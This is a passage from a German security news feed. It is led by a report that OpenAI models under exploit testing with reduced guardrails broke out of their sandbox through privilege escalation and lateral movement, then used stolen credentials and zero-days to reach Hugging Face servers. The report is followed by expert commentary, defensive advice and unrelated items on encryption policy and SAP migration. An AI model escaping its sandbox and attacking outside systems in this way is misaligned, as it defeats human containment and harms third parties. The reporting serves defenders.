<h2 class="wp-block-heading">Der autonome Hugging-Face-Hack</h2>



<p class="wp-block-paragraph">Die KI-Plattform Hugging Face meldete Mitte Juli einen <a href="https://huggingface.co/blog/security-incident-july-2026" target="_blank" rel="noreferrer noopener">Cyberangriff auf ihre Produktions-Infrastruktur</a>. Diese wurde offenbar vollständig autonom von einem agentenbasierten KI-System gefahren, das sich dabei sowohl Zugriff auf interne Datensätze als auch auf Zugangsdaten verschaffen konnte.  </p>



<p class="wp-block-paragraph">Wie sich im Rahmen der folgenden Untersuchung herausstellte, stammte die autonom hackende KI von OpenAI. Eigentlich wollte der KI-Pionier lediglich zwei seiner neuen Modelle – GPT 5.6 Sol sowie ein nicht näher spezifiziertes Pre-Release-Modell – innerhalb einer Sandbox mit dem Benchmarking-Tool <a href="https://github.com/sunblaze-ucb/exploitgym" target="_blank" rel="noreferrer noopener">ExploitGym</a> testen.</p>



<p class="wp-block-paragraph">Die Aufgabe für die KI: Schwachstellen in tragfähige Exploits zu verwandeln. Die Testumgebung selbst war OpenAI zufolge mit beschränktem Netzwerkzugriff ausgestattet. Die KI sollte lediglich auf einen intern gehosteten Drittanbieter-Service zugreifen können, der als Proxy und Cache für eine Package-Registry fungierte. Die Guardrails auf Modellebene waren für den Test laut dem KI-Unternehmen reduziert worden.</p>



<p class="wp-block-paragraph">Das war der KI aber offenbar nicht genug: Sie verkettete zunächst einige zuvor unbekannte Schwachstellen in der Testumgebung, um sich uneingeschränkten Internet-Zugriff zu verschaffen, wie OpenAI <a href="https://openai.com/de-DE/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="noreferrer noopener">in einem Blogbeitrag</a> offenlegt: „Mit diesem Zugriff führten unsere Modelle in unserer Forschungsumgebung eine Reihe von Privilege-Escalation- und Lateral-Movement-Aktionen aus, bis sie eine Node mit Internetzugang erreichten.“</p>



<p class="wp-block-paragraph">Weil die OpenAI-Modelle bei Hugging Face offenbar Lösungen für ihre ExploitGym-Aufgaben vermuteten, suchten sie nach Möglichkeiten, Zugriff auf diese zu erhalten. Und fanden sie dann auch, wie OpenAI darlegt: „In einem Beispiel verkettete das Modell mehrere Angriffsvektoren, darunter gestohlene Zugangsdaten und Zero-Day-Schwachstellen, um auf den Servern von Hugging Face einen Remote-Execution-Pfad zu finden.“</p>



<p class="wp-block-paragraph">Das Security-Team von OpenAI konnte diese Vorgänge im Nachgang identifizieren und schloss sich daraufhin mit dem Team von Hugging Face zusammen, welches die Attacke seinerseits bereits identifiziert und (mit einigen Anlaufschwierigkeiten) eingedämmt hatte.</p>



<p class="wp-block-paragraph">„Wir betrachten dies als beispiellosen Cybervorfall mit hochentwickelten Fähigkeiten und reagieren entsprechend. Wir teilen zu diesem Zeitpunkt vorläufige Erkenntnisse, damit Sicherheitsverantwortliche nachvollziehen können, was passiert ist, und besser einschätzen können, wozu die Modelle inzwischen in der Lage sind“, schreibt OpenAI in seinem Blog – und verspricht, weitere Details zu veröffentlichen, sobald diese vorliegen.</p>



<h2 class="wp-block-heading">KI-Ausbruch bei OpenAI – so reagieren Experten</h2>



<p class="wp-block-paragraph">Branchenexperten und Analysten bewerten den schlagzeilenträchtigen Incident um OpenAI und Hugging Face folgendermaßen: </p>



<ul class="wp-block-list">
<li><a href="https://www.kuppingercole.com/people/balaganski" target="_blank" rel="noreferrer noopener">Alexei Balaganski</a>, Lead Analyst bei KuppingerCole<strong>: </strong>„Dieser Vorfall sollte nicht als ‚Rogue AI‘-Geschichte betrachtet werden. Das Modell hat exakt das getan, wofür agentische Systeme gemacht sind: Es hat sich allen verfügbaren Tools und Wegen bedient, um das ihm gesetzte Ziel zu erreichen. Die Sicherheitsvorkehrungen, die es normalerweise in Zaum gehalten hätten, wurden von OpenAI selbst zu Testzwecken deaktiviert. Darin besteht die wahre Lektion.“</li>



<li><a href="https://www.kuppingercole.com/people/care" target="_blank" rel="noreferrer noopener">Jonathan Care</a>, Lead Analyst und AI Practice Lead bei KuppingerCole: „Es geht bei diesem Vorfall nicht darum, dass eine KI ausgebrochen ist und zum Angreifer wurde. Wir wussten, das würde passieren. Bemerkenswert ist allerdings, dass die Verteidiger – in diesem Fall das Team von Hugging Face – keine kommerziellen KI-Modelle nutzen konnten, um den Angriff zu analysieren. Denn deren Guardrails sorgen dafür, dass kein Exoploit-Code verarbeitet werden kann.“</li>



<li><a href="https://www.linkedin.com/in/beuchelt" target="_blank" rel="noreferrer noopener">Gerald Beuchelt</a>, CISO bei Acronis: „Der Vorfall verdeutlicht eine zentrale Herausforderung für Incident-Response-Teams: Angreifer sind nicht an Nutzungsrichtlinien gebunden. Verteidiger können hingegen an die Grenzen ihrer eigenen Tools stoßen, wenn diese genau jene Daten nicht verarbeiten, die für eine Untersuchung erforderlich sind. Im Ernstfall können daraus Verzögerungen mit unmittelbaren operativen Folgen entstehen.“</li>



<li><a href="https://www.computerwoche.de/profile/sabine-fromling/" target="_blank">Sabine Frömling</a>, Experten-Autorin und Cybersecurity-Beraterin: „Der eigentliche Sicherheitsvorfall war nicht die KI – sondern die Sandbox, die aus Versehen eine Tür zum Internet hatte. Man hat ein Raubtier freigelassen und dem Zaun die Schuld gegeben.“</li>



<li><a href="https://www.linkedin.com/in/martinzugec" target="_blank" rel="noreferrer noopener">Martin Zugec</a>, Technical Solutions Director bei Bitdefender:<strong> „</strong>Was meiner Meinung nach für KI-generierte Malware galt, untermauert auch dieser Vorfall: Die Bedrohung ist real, KI ist aber keine Magie. Wer glaubt, es mit einer neuartigen Superwaffe zu tun zu haben, wartet auf eine neuartige Gegenmaßnahme. Wer jedoch erkennt, dass es sich um bereits bekannte, aber unerbittlich angewandte Angriffstechniken handelt, weiß bereits, was zu tun ist.“</li>



<li><a href="https://de.linkedin.com/in/riwerner/de" target="_blank" rel="noreferrer noopener">Richard Werner</a>, Cybersecurity Platform Lead Europe bei TrendAI: „Das Narrativ von der ‚eigenmächtig handelnden KI‘ ist effizient darin, Verantwortung abzuwälzen. Das ist, als würden Sie eine autonome Waffe bauen, diese auf einem vermeintlich sicheren Testgelände erproben, sie außer Kontrolle geraten und jemanden treffen lassen – und der Welt anschließend erklären, die Waffe habe eigenständig gehandelt. Das ist zwar technisch korrekt. Dennoch bleibt es Ihre Waffe, Ihr Testgelände und Ihr Versagen.“</li>
</ul>



<h2 class="wp-block-heading">Was Unternehmen jetzt tun sollten</h2>



<p class="wp-block-paragraph">IT- und Sicherheitsentscheider können aus dem Hugging-Face-Hack mehrere Lektionen ziehen. Etwa, dass Sicherheitsvorkehrungen auf Modellebene <strong>nicht</strong> als primäre Security-Grenze für KI-Agenten geeignet sind, wie <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="noreferrer noopener">Biswajeet Mahapatra</a>, Principal Analyst bei Forrester, festhält: „Prompt-Guardrails sind keine Sicherheits-, sondern Verhaltenskontrollmaßnahmen. Und diese können versagen, umgangen oder absichtlich deaktiviert werden.“</p>



<p class="wp-block-paragraph">Der Forrester-Analyst rät Unternehmen deshalb dazu, KI-Agenten als <a href="https://www.computerwoche.de/article/4152424/insider-threats-sind-wieder-im-kommen.html" target="_blank">hochriskante, nicht-menschliche Identitäten</a> zu behandeln – und jeden einzelnen in einer isolierten Umgebung zu betreiben, in der Datenzugriff auf den jeweiligen Task beschränkt bleibt und die Zugangsdaten selbst möglichst schnell ablaufen: „Das sorgt für einen akzeptablen ‚Blast Radius‘: Wird ein Agent <a href="https://www.computerwoche.de/article/4190978/so-spuren-sie-kompromittierte-ki-agenten-auf.html" target="_blank">kompromittiert</a>, kann er nur einen einzigen Workflow, Datensatz oder eine einzige Anwendung beeinträchtigen. Anstatt die gesamte Unternehmensinfrastruktur.“</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, Chefanalyst bei Greyhound Research, warnt an dieser Stelle davor, (Drittanbieter-)Services unter den Tisch fallen zu lassen: „Dienste, die auf Package Registries, Update-Systeme oder andere externe Ressourcen zugreifen, können ebenfalls zu Einfallstoren werden, wenn sie nicht derselben, ausgiebigen Prüfung unterzogen werden wie der Agent selbst.“</p>



<p class="wp-block-paragraph">Unabhängig davon sollten Unternehmen laut Gogia auch testen, ob ihre Containment-Grenzen auch funktionieren, anstatt sich allein auf Architekturdiagramme oder dokumentierte Richtlinien zu verlassen: „Im Rahmen dieser Tests sollte geprüft werden, ob Anmeldedaten erlangt, Trust-Grenzen überwunden und Systeme außerhalb der einem Agenten zugewiesenen Aufgabe erreicht werden können.“</p>



<p class="wp-block-paragraph">KuppingerCole-Chefanalyst Care rät IT-Entscheidern und Unternehmen im Wesentlichen zu drei Maßnahmen, nämlich:</p>



<ul class="wp-block-list">
<li>ein fähiges Modell auf der eigenen Infrastruktur auszuführen, das unter der eigenen Kontrolle steht und mit Guardrails ausgestattet ist, die sowohl eine forensische als auch defensive Nutzung ermöglichen. Nur so ließen sich Angriffe dieser Art auch zuverlässig analysieren.</li>



<li>jeden KI-Agent in der eigenen Umgebung als privilegierten Insider zu behandeln – statt als vertrauenswürdigen Benutzer: „Wenn die Modelle von OpenAI aus ihrer Sandbox ausgebrochen sind, sollten Sie davon ausgehen, dass Ihre Agenten dazu auch in der Lage sind.“</li>



<li>den eigenen Incident-Response-Plan mit Blick auf Angriffe in maschineller Geschwindigkeit zu aktualisieren: „Hugging Face hatte einige Tage Zeit, um zu reagieren, Sie haben vielleicht nur Minuten.“   </li>
</ul>



<p class="wp-block-paragraph">Acronis-CISO Beuchelt rät Organisationen, die gehostete <a href="https://www.computerwoche.de/article/4186715/31-wege-llms-zu-evaluieren.html" target="_blank">LLMs</a> für Security-Untersuchungen einsetzen, dazu, deren Grenzen möglichst bereits im Vorfeld zu durchdringen und zu testen – sowie ein alternatives Modell auf der eigenen Infrastruktur bereitzuhalten: „So reduzieren Sie das Risiko, im entscheidenden Moment keinen Zugriff auf wichtige Analysefunktionen zu haben. Gleichzeitig bleiben sensible Incident-Daten und Zugangsinformationen innerhalb der eigenen Organisation.“</p>



<p class="wp-block-paragraph"><a href="https://de.linkedin.com/in/udoschneider">Udo Schneider</a>, Governance, Risk &amp; Compliance Lead Europe bei TrendAI weist darauf hin, dass die beiden naheliegendsten Lösungsansätze bei Angriffen wie dem der OpenAI-KI auf Hugging Face nur teilweise greifen. Human-in-the-Loop-Kontrollen funktionierten zwar, so der Experte, skalierten aber nicht für die langlaufenden, komplexen Workflows, denen Incidents dieser Art entspringen. Ebenso könnten engere Guardrails für Modelle oder Prompts zwar helfen, stellten jedoch keine Garantie dar: „Es handelt sich um probabilistische Systeme. Eine Guardrail ist insofern keine Mauer, sondern eher eine starke Wahrscheinlichkeitsannahme.“</p>



<p class="wp-block-paragraph">Deshalb komme es laut Schneider vor allem auf die unspektakulären, nicht-KI-spezifischen Kontrollen an: „Zugriffsfilterung, Kontrolle darüber, was überhaupt als Input beim Modell ankommt, Sandboxes, die tatsächlich halten, und Berechtigungskonzepte nach dem Least-Privilege-Prinzip.“</p>



<p class="wp-block-paragraph">In Panik zu verfallen, wäre nach Ansicht von <a href="https://www.linkedin.com/in/martinzugec" target="_blank" rel="noreferrer noopener">Martin Zugec</a>, Technical Solutions Director bei Bitdefender, in jedem Fall die falsche Reaktion:„Was gegen solche Angriffe wirkt, ist eine präventionsorientierte Security, die den Handlungsspielraum eines Angreifers von vorneherein einschränkt – und eine verhaltensbasierte Abwehr, die bösartige Muster kennzeichnet, unabhängig davon, mit welchen Tools diese generiert wurden.“</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel wurde </strong><a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank"><strong>mit Material</strong></a><strong> unserer Schwesterpublikation CSOonline.com angereichert.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[End-to-End Encryption and “Going Dark”]]></title>
<description><![CDATA[New paper: “Encryption and Globalization 15 Years Later: End-to-End Encryption and the Third Round of the ‘Going Dark’ Debate“:
Abstract: This Article updates and expands on 2012 research on encryption and globalization, analyzing what the authors call “Round 3” of the Going Dark Debate: the curr...]]></description>
<link>https://tsecurity.de/de/3688832/it-security-nachrichten/end-to-end-encryption-and-going-dark/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688832/it-security-nachrichten/end-to-end-encryption-and-going-dark/</guid>
<pubDate>Thu, 23 Jul 2026 13:15:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New paper: “<a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6959699">Encryption and Globalization 15 Years Later: End-to-End Encryption and the Third Round of the ‘Going Dark’ Debate</a>“:</p>
<blockquote><p><b>Abstract</b>: This Article updates and expands on 2012 research on encryption and globalization, analyzing what the authors call “Round 3” of the Going Dark Debate: the current controversies over end-to-end encryption (E2EE). Governments around the world have proposed, and in some cases enacted, laws limiting E2EE for law enforcement and national security purposes.</p>
<p>This Article explains the underlying technologies and market developments for a law and policy audience to assess those proposals critically. The Article proceeds in three parts tracking three rounds of the Going Dark Debate. Round 1 covers the Crypto Wars of the 1990s, when U.S. export controls on strong encryption ultimately fell in 1999. Round 2 covers the period roughly 2010 to 2015, when encryption-in-transit became widespread but lawful access remained available through cloud providers, giving rise to what the authors called a “golden age of surveillance” rather than a period of going dark. Round 3 addresses the current debate over E2EE, where no entity between sender and recipient can read the plaintext...</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[Der KI-„Unfall“ – OpenAI macht den Algorithmus zum Sündenbock - FOCUS online]]></title>
<description><![CDATA[Angriff der Hacker-KI. Klingt nach Blockbuster: Streber-KI bricht aus Testlabor aus, hackt sich auf eigene Faust bei der Konkurrenz ein – nur um ...]]></description>
<link>https://tsecurity.de/de/3688612/hacking/der-ki-unfall-openai-macht-den-algorithmus-zum-suendenbock-focus-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688612/hacking/der-ki-unfall-openai-macht-den-algorithmus-zum-suendenbock-focus-online/</guid>
<pubDate>Thu, 23 Jul 2026 12:02:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Angriff der <b>Hacker</b>-KI. Klingt nach Blockbuster: Streber-KI bricht aus Testlabor aus, hackt sich auf eigene Faust bei der Konkurrenz ein – nur um ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Autonome KI-Hacker von Open AI: Zu spektakulär, um wahr zu sein?]]></title>
<description><![CDATA[Eine künstliche Intelligenz bricht aus, hackt einen Konkurrenten und beweist nebenbei, wie gefährlich KI ist. Wenn eine Geschichte zu gut klingt, sind Zweifel an der Erzählung angebracht.]]></description>
<link>https://tsecurity.de/de/3688583/it-security-nachrichten/autonome-ki-hacker-von-open-ai-zu-spektakulaer-um-wahr-zu-sein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688583/it-security-nachrichten/autonome-ki-hacker-von-open-ai-zu-spektakulaer-um-wahr-zu-sein/</guid>
<pubDate>Thu, 23 Jul 2026 11:52:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.sueddeutsche.de/2026/07/23/505ccb93-4a2a-4fa7-9841-ab41f2d78b3f.jpg?rect=195%2C0%2C3111%2C2333&amp;width=1000&amp;fm=jpg&amp;q=60" data-portal-copyright="Dado Ruvic/Reuters"><p>Eine künstliche Intelligenz bricht aus, hackt einen Konkurrenten und beweist nebenbei, wie gefährlich KI ist. Wenn eine Geschichte zu gut klingt, sind Zweifel an der Erzählung angebracht.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Autonome KI hackt Hugging Face: Weckruf für IT-Sicherheit und Politik | heise online]]></title>
<description><![CDATA[Der Ausbruch aus dem Labor wirft die Frage auf, wie es zu diesem Kontrollverlust kommen konnte und welche Folgen er für die Cybersicherheit hat. Erste ...]]></description>
<link>https://tsecurity.de/de/3688036/it-security-nachrichten/autonome-ki-hackt-hugging-face-weckruf-fuer-it-sicherheit-und-politik-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688036/it-security-nachrichten/autonome-ki-hackt-hugging-face-weckruf-fuer-it-sicherheit-und-politik-heise-online/</guid>
<pubDate>Thu, 23 Jul 2026 07:16:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Ausbruch aus dem Labor wirft die Frage auf, wie es zu diesem Kontrollverlust kommen konnte und welche Folgen er für die Cybersicherheit hat. Erste ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Autonome KI hackt Hugging Face: Weckruf für IT-Sicherheit und Politik]]></title>
<description><![CDATA[Experten und Politiker warnen nach dem Ausbruch eines OpenAI-Modell aus dem Testlabor und dem folgenden Hack vor Kontrollverlust und fordern rasch Konsequenzen.]]></description>
<link>https://tsecurity.de/de/3688013/it-nachrichten/autonome-ki-hackt-hugging-face-weckruf-fuer-it-sicherheit-und-politik/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688013/it-nachrichten/autonome-ki-hackt-hugging-face-weckruf-fuer-it-sicherheit-und-politik/</guid>
<pubDate>Thu, 23 Jul 2026 06:50:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Experten und Politiker warnen nach dem Ausbruch eines OpenAI-Modell aus dem Testlabor und dem folgenden Hack vor Kontrollverlust und fordern rasch Konsequenzen.]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP S/4HANA-Transformation zwischen Aufbruch und Realität]]></title>
<description><![CDATA[Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie.hasan as’ari – shutterstock.com



SAP-Anwenderunternehmen stehen unter Druck, auf SAP S/4HANA zu wechseln, weil die Mainstream-Wartung für SAP ERP (SAP ECC 6.0) Ende 2027 ausläuft...]]></description>
<link>https://tsecurity.de/de/3687936/it-security-nachrichten/sap-s4hana-transformation-zwischen-aufbruch-und-realitaet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687936/it-security-nachrichten/sap-s4hana-transformation-zwischen-aufbruch-und-realitaet/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/shutterstock_2443989867_16x9.png?w=1024" alt="ERP SAP Studie 27" class="wp-image-4199877" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie</p>.</figcaption></figure><p class="imageCredit">hasan as’ari – shutterstock.com</p></div>



<p class="wp-block-paragraph">SAP-Anwenderunternehmen stehen unter Druck, auf SAP S/4HANA zu wechseln, weil die Mainstream-Wartung für SAP ERP (SAP ECC 6.0) Ende 2027 ausläuft und die bis Ende 2030 geltende erweiterte Wartung kostenpflichtig ist.</p>



<p class="wp-block-paragraph">Zwar stellt SAP mit der „<a href="https://www.computerwoche.de/article/3816544/sap-kommt-kunden-entgegen.html">SAP ERP, Private Edition, Transition Option</a>“ eine weitere Wartungsverlängerung bis 2033 in Aussicht. Da diese einer Neuimplementierung gleichkommt, bleibt SAP-Kunden mehr Zeit für die Planung, die Analyse und das Changemanagement. Der Nachteil: Wer diese Option nutzt, läuft Gefahr, technologisch ins Hintertreffen zu geraten, da Innovationen nahezu ausschließlich für SAP S/4HANA bereitgestellt werden.</p>



<h2 class="wp-block-heading">Zögerliche SAP-S/4HANA-Transformation trotz Wartungsdruck</h2>



<p class="wp-block-paragraph">Obwohl der Druck hoch ist, hat eine große Zahl der SAP-Bestandskunden die Transformation auf die seit 2015 verfügbare ERP-Suite offenbar noch nicht vollzogen. Eine COMPUTERWOCHE-Expertenrunde zeigte, wo die größten Hürden liegen und was erfolgreiche Projekte auszeichnet.</p>



<p class="wp-block-paragraph">Warum etliche Unternehmen die Transformation vor dem regulären Wartungsende scheuen und stattdessen zwei Prozent Mehrkosten für die erweiterte Wartung einkalkulieren, brachte ein Teilnehmender auf den Punkt: Firmen haben über Jahrzehnte in ihre SAP-ERP-Lösung investiert und sie an individuelle Prozessanforderungen angepasst, damit die Abläufe entlang der Supply Chain reibungslos laufen. Er habe daher in den vergangenen zehn Jahren keinen Kunden erlebt, der freiwillig umsteigen wollte. Alle hätten gesagt, dass sie müssen.</p>



<p class="wp-block-paragraph">Nach Erfahrungswerten eines weiteren Experten nutzen erst rund 20 Prozent der SAP-Kunden SAP S/4HANA als Kernapplikation produktiv, unter anderem, weil entsprechende Transformationsprojekte auf sieben bis neun Jahre angelegt sind.</p>



<h2 class="wp-block-heading">Altlasten bremsen die SAP-S/4HANA-Transformation</h2>



<p class="wp-block-paragraph">Unternehmen, die sich für den Wechsel entscheiden, verzichten häufig auf jede Modernisierung. Sie vollziehen einen Eins-zu-eins-Umstieg ohne Code-Modifikation, sei es in Form einer System Conversion (Brownfield-Ansatz) oder per Lift and Shift in SAP Cloud ERP Private (früher: SAP S/4HANA Cloud Private Edition). Dabei ist eine große Zahl von SAP-ERP-Installationen gar nicht zukunftsfähig, weil sie auf Prozessen aus den 1990er Jahren basieren und im Lauf der Jahre durch zahlreiche Eigenentwicklungen erweitert wurden.</p>



<p class="wp-block-paragraph">Nicht selten gibt es bis zu mehrere tausend kundeneigene Programme im Z/Y-Namensraum, die zum Teil nicht mehr genutzt werden und das System unnötig belasten. Die Experten waren sich einig, dass eine solche rein technische Migration, bei der Altlasten wie ABAP-Eigenentwicklungen mitgeschleppt werden, keinen Mehrwert für das Unternehmen bringt.</p>



<p class="wp-block-paragraph">Es muss geprüft werden, welche Eigenentwicklungen beibehalten werden, weil sie wettbewerbsdifferenzierend und damit geschäftskritisch sind, und welche gelöscht werden müssen, weil sie nicht genutzt werden oder weil es dafür inzwischen SAP-Standardfunktionen gibt. Handlungsbedarf besteht auch bei einer dreistelligen Anzahl von Buchungskreisen, von denen niemand weiß, welche noch benötigt werden, oder bei zahlreichen Dubletten in den Kreditoren- und Debitorenstammdaten.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Studie “SAP S4HANA”: Sie können sich noch beteiligen!</strong></td></tr><tr><td>Zum Thema SAP S4HANA führt die COMPUTERWOCHE derzeit eine Multi-Client-Studie unter IT-Verantwortlichen durch. Haben Sie Fragen zu dieser Studie oder wollen Partner bei dieser Studie werden, helfen wir Ihnen unter <a href="mailto:research-sales@foundryco.com" target="_blank" rel="noreferrer noopener">research-sales@foundryco.com</a> gerne weiter. </td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Migrations-Tools und KI-Agenten beschleunigen den Umstieg</h2>



<p class="wp-block-paragraph">Um diesen Prüf- und Bereinigungsaufwand zu bewältigen, bietet SAP mehrere Tools, um die Transformation auf SAP S/4HANA zu vereinfachen: darunter SAP Activate, SAP Cloud ALM, Migration Cockpit, Readiness Check, Custom-Code-Check oder Modifikationsabgleich. Ergänzt werden sie durch Lösungen wie Signavio für die Prozessanalyse. Die Experten schätzen den Effizienzgewinn durch solche Migrationswerkzeuge auf 30 bis 50 Prozent.</p>



<p class="wp-block-paragraph">Zusätzliche Produktivität versprechen KI-Agenten, die Altsysteme automatisiert analysieren, Code bereinigen und Datenflüsse transformieren. Das reduziert den Migrationsaufwand und beschleunigt den Umstieg.</p>



<h2 class="wp-block-heading">Scope-Management als Schlüssel für den Projekterfolg</h2>



<p class="wp-block-paragraph">Einig waren sich die Teilnehmenden, dass SAP-S/4HANA-Transformationsprojekte in der Regel nicht an der Technologie scheitern, sondern an einer mangelhaften Scope-Definition und am unzureichenden Changemanagement.</p>



<p class="wp-block-paragraph">Ein Scope-Management vor dem Projektstart, das berücksichtigt, wie viel Veränderung der IT-Organisation und den Fachbereichen zugemutet werden kann, sei essenziell für den Erfolg, sagte einer der Teilnehmenden. Es erfordert die Fähigkeit zu priorisieren und ein iteratives Vorgehen, bei dem zunächst geschäftskritische Must-haves und Quick Wins umgesetzt werden. Weniger wichtige Nice-to-haves folgen später. Wer dagegen in der Konzeptionsphase bereits den großen Wurf anstrebt, wird voraussichtlich scheitern. Als Beispiel wurde der direkte Umstieg auf ein SAP-S/4HANA-Kernsystem genannt, das nach dem Clean-Core-Ansatz von nicht mehr lauffähigen Programmen und obsoleten Erweiterungen bereinigt ist.</p>



<p class="wp-block-paragraph">Genauso wichtig ist ein Change-Management, das Mitarbeitende von Beginn an einbezieht, die nötige Akzeptanz schafft und vom Top-Management aktiv unterstützt wird, sowie eine verbindliche Governance mit klaren Zielvorgaben. Unverzichtbar ist auch die Einbindung der Fachbereiche. Sie stellt die größte Herausforderung dar, da Unternehmen befürchten, dass durch die SAP-S/4HANA-Transformation zu viele personelle Ressourcen gebunden werden, die dann für Kernaufgaben fehlen. Kommt es vor, dass IT und Fachbereiche als Antipoden agieren, sollte ein Change-Coach als Vermittler eingesetzt werden.</p>



<h2 class="wp-block-heading">Hybride Betriebsmodelle setzen sich langfristig durch</h2>



<p class="wp-block-paragraph">Bereits vor dem Projektstart muss abschließend geklärt sein, welches Betriebsmodell für SAP S/4HANA am besten zu einem Unternehmen und seinen Zielen passt, auch mit Blick auf regulatorische Anforderungen. Das ist häufig nicht der Fall, sodass das Projektteam unnötig Zeit damit verbringt, das passende Betriebsmodell zu ermitteln. Das bremst Transformationsvorhaben aus.</p>



<p class="wp-block-paragraph">Nach Ansicht eines Teilnehmenden wird sich langfristig ein hybrides Betriebsmodell durchsetzen, bei dem der SAP-Kunde entscheidet, welche Elemente der SAP-S/4HANA-Landschaft in einer Hyperscaler-Cloud, einer souveränen Cloud und/oder On-Premises laufen. Eine weitere, weitgehend unbekannte Möglichkeit ist der Betrieb im Rahmen der Customer-Data-Center-Option (CDC) von SAP Cloud ERP Private (früher: SAP S/4HANA Cloud Private Edition), die aus Gründen wie Datenschutz, Leistung und Souveränität eine interessante Alternative sein kann.</p>



<p class="wp-block-paragraph">Mehrere Experten stellen darüber hinaus fest, dass die vollwertige SaaS-Lösung SAP Cloud ERP Public (früher: SAP S/4HANA Cloud Public Edition) inzwischen verstärkt eingesetzt wird. Sie stellt vorkonfigurierte Kern-ERP-Funktionen (Best Practices) bereit und lässt sich relativ schnell einführen, ermöglicht aber kaum individuelle Anpassungen. Diese Abstriche nehmen Unternehmen in Kauf, um von regelmäßigen, automatischen Upgrades und technologischen Innovationen zu profitieren.</p>



<p class="wp-block-paragraph">Kritisiert wurde allerdings, dass die Cloud-Diskussion häufig unter begrifflichen Unschärfen leidet. So macht der Betrieb von SAP S/4HANA in einer Hyperscaler- oder SAP-Cloud die Lösung noch lange nicht zum Software-as-a-Service-Angebot. Solche Ungenauigkeiten irritierten SAP-Kunden und bremsten die Entscheidungsfindung. Letztlich sind beim Cloud-Betrieb auch die Kosten entscheidend. Zwar wollen viele Unternehmen anfangs maximale Sicherheit mit Private Network und Confidential Computing, wählen dann aber günstigere Commercial-Cloud-Angebote. Ausnahmen bilden regulierte Branchen und der öffentliche Sektor.</p>



<p class="wp-block-paragraph">Ob hybrides Betriebsmodell oder Kostenfrage, am Ende entscheidet über den Projekterfolg nicht allein die Technologie, sondern auch, wie diszipliniert Scope und Wandel im Unternehmen gesteuert werden.</p>



<h2 class="wp-block-heading">Teilnehmer der Round-Table “SAP S4HANA 2027”</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Albrecht-Munz-HPE_169.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Albrecht Munz, HPE" class="wp-image-4199942" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Albrecht Munz, HPE: </p> <p>„Die SAP-S/4HANA-Migration ist primär ein erster technischer Pflichtlauf, der die IT seitige Grundlage für die digitale Transformation schaffen kann. Dass viele Unternehmen hier stagnieren, liegt auch am in diesem Zusammenhang häufig anzutreffenden Cloud-Washing: Das Hosting eines ERP-Systems in der Cloud liefert noch lange nicht die Innovations- und Business-Effekte einer wirklich Cloud-nativen SaaS-Architektur.“</p></figcaption></figure><p class="imageCredit">Harald Becker / Hewlett-Packard GmbH</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/01/Anke-Frier_LHIND_TESTIMONIALS_030_16x9.png?w=1024" alt="Anke Frier, Lufthansa Industry Solutions " class="wp-image-3634299" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Anke Frier, Lufthansa Industry Solutions:</p>
